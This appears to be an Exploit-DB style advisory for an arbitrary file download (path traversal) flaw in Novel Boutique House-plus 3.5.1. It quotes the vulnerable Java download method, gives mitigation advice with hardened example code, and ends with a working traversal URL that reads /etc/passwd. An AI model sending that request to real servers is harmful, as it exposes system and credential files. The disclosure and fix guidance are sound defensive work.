Vendor: Boutique House-plus
By: tuyiqiang
CVSS: 7.5 (HIGH)
Vulnerability Type: Arbitrary File Download
CWE: 22
Product Name: Boutique House-plus
Affected Version From: all
Affected Version To: all
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested: Linux
Year: 2021

Novel Boutique House-plus 3.5.1 – Arbitrary File Download

Novel Boutique House-plus version 3.5.1 is vulnerable to an arbitrary file download attack. The 'fileDownload' method in 'FileController.java' takes a caller-supplied 'filePath' parameter and appends it directly to the configured upload directory before opening the file. Because the parameter is never normalized or checked against that directory, a crafted 'filePath' containing directory traversal sequences escapes the upload directory and lets an attacker download sensitive files from the server, such as '/etc/passwd'.

Mitigation:

To mitigate this vulnerability, validate and sanitize the 'filePath' parameter so that directory traversal sequences are rejected before any file is opened. Additionally, access controls should restrict who may reach the download endpoint and which files it may serve.
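As an added example (not the project's code and not part of the original advisory), the following hardened version of fileDownload shows the check the mitigation calls for: the user-supplied filePath is resolved against the upload directory, canonicalised, and rejected unless the result still lies inside that directory. Only the method signature and the idea of a configured upload directory come from the vulnerable code above; the class name, the uploadDir field, the helper method and the error handling are assumptions.

```java
import java.io.InputStream;
import java.io.IOException;
import java.io.OutputStream;
import java.net.URLEncoder;
import java.nio.file.Files;
import java.nio.file.NoSuchFileException;
import java.nio.file.Path;
import java.nio.file.Paths;
import javax.servlet.http.HttpServletResponse;

/**
 * Hypothetical hardened download handler (example code, not the project's own).
 * The upload directory is injected at construction time; in the real controller
 * it would come from the same configuration object the advisory shows.
 */
public class SafeFileDownload {

    private final Path uploadDir;

    public SafeFileDownload(String uploadPath) {
        this.uploadDir = Paths.get(uploadPath);
    }

    /**
     * Resolves a caller-supplied relative path against the upload directory and
     * rejects anything that escapes it. Both sides are canonicalised with
     * toRealPath() (which follows symlinks), so "../" sequences, absolute paths
     * and symlinked files are all caught by the same startsWith check.
     */
    static Path resolveInsideUploadDir(Path uploadDir, String userPath) throws IOException {
        if (userPath == null || userPath.isEmpty()) {
            throw new IllegalArgumentException("filePath is required");
        }
        Path base = uploadDir.toRealPath();
        // resolve() of an absolute userPath ignores base entirely, and normalize()
        // collapses "..": the startsWith check is what actually enforces containment.
        Path candidate = base.resolve(userPath).normalize();
        if (!candidate.startsWith(base)) {
            throw new SecurityException("path escapes upload directory");
        }
        // Canonicalise the final target as well, then re-check, so a symlink
        // placed inside the upload directory cannot point back outside it.
        Path real = candidate.toRealPath();
        if (!real.startsWith(base) || !Files.isRegularFile(real)) {
            throw new SecurityException("path escapes upload directory");
        }
        return real;
    }

    public void fileDownload(String filePath, String fileName, HttpServletResponse resp) throws IOException {
        Path target;
        try {
            target = resolveInsideUploadDir(uploadDir, filePath);
        } catch (IllegalArgumentException | SecurityException e) {
            // Log the rejected value server-side for detection; the client gets no detail.
            resp.sendError(HttpServletResponse.SC_BAD_REQUEST);
            return;
        } catch (NoSuchFileException e) {
            resp.sendError(HttpServletResponse.SC_NOT_FOUND);
            return;
        }

        // Name the attachment after the file actually served, not the caller's fileName.
        String safeName = URLEncoder.encode(target.getFileName().toString(), "UTF-8");
        resp.setHeader("Content-Disposition", "attachment;filename=" + safeName);
        resp.setContentLengthLong(Files.size(target));

        try (InputStream in = Files.newInputStream(target);
             OutputStream out = resp.getOutputStream()) {
            in.transferTo(out); // Java 9+
        }
    }
}
```

The containment check is applied twice on purpose: once on the normalized path, so a traversal attempt is refused before the filesystem is touched, and once on the real path after symlinks are followed. Rejections are reported to the client as a generic 400 while the offending filePath is left to server-side logging, which is also the signal a detection rule for this endpoint would key on.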
Source

Exploit-DB raw data:

# Exploit Title: Novel Boutique House-plus 3.5.1 - Arbitrary File Download
# Date: 27/03/2021
# Exploit Author: tuyiqiang
# Vendor Homepage: https://xiongxyang.gitee.io/
# Software Link: https://gitee.com/novel_dev_team/novel-plus,https://github.com/201206030/novel-plus
# Version: all
# Tested on: linux

Vulnerable code:

com/java2nb/common/controller/FileController.java

```java
@RequestMapping(value = "/download")
public void fileDownload(String filePath, String fileName, HttpServletResponse resp) throws Exception {
    // filePath is appended to the upload directory with no normalization or
    // containment check, so "../" sequences escape the intended directory.
    String realFilePath = jnConfig.getUploadPath() + filePath;
    InputStream in = new FileInputStream(realFilePath);
    fileName = URLEncoder.encode(fileName, "UTF-8");
    resp.setHeader("Content-Disposition", "attachment;filename=" + fileName);

    resp.setContentLength(in.available());

    OutputStream out = resp.getOutputStream();
    byte[] b = new byte[1024];
    int len = 0;
    while ((len = in.read(b)) != -1) {
        out.write(b, 0, len);
    }
    out.flush();
    out.close();
    in.close();
}
```


Guide:

1. Log in to the background management console
2. http://xxxx/common/sysFile/download?filePath=../../../../../../../../../../../../../../../../../etc/passwd&fileName=passwd